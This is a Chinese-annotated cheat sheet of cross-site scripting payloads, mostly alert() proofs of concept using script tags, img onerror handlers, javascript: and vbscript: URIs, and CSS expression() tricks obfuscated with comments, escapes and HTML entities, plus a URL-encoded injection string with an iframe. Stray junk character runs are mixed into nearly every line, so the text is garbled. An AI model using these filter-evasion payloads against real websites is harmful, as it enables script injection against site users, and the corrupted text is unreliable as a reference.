<script>alert("跨站")</script> (最常用)5 Y) V' S) H* S5 H8 w7 R0 F
<img scr=javascript:alert("跨站")></img>
8 l: ?* H6 p5 ?6 k$ Q. i<img scr="javascript: alert(/跨站/)></img>
7 B4 {& o8 q+ [ Q- Q+ V% {<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)1 s' v: n7 c% u" M, |; u/ v
<img scr="#" onerror=alert(/跨站/)></img>- y7 y; C4 I# U4 i8 e S0 L
<img scr="#" style="xss:expression(alert(/xss/));"></img>
& y: y" R* b/ K$ e: B' u( N<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
8 v7 R% H8 L5 V. ^<img src=vbscript:msgbox ("xss")></img>% k m l) S8 Q. ?3 P, [' U
<style> input {left:expression (alert('xss'))}</style>
# S% |- T3 s& @3 v<div style={left:expression (alert('xss'))}></div>
* a9 D2 g8 Q/ J. y# \8 M+ `<div style={left:exp/* */ression (alert('xss'))}></div>: d1 ?% L7 f5 {3 P* W) f) `& e
<div style={left:\0065\0078ression (alert('xss'))}></div>
6 I8 t6 W3 a0 K/ P/ H: ihtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
) d3 s* T% d2 @' z. M+ z8 q, cunicode <div style="{left:expRessioN (alert('xss'))}">
6 i2 u: u ~! [' u$ e+ U
0 m2 P5 @& x" A"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
% b% t1 T! }% e2 h1 w |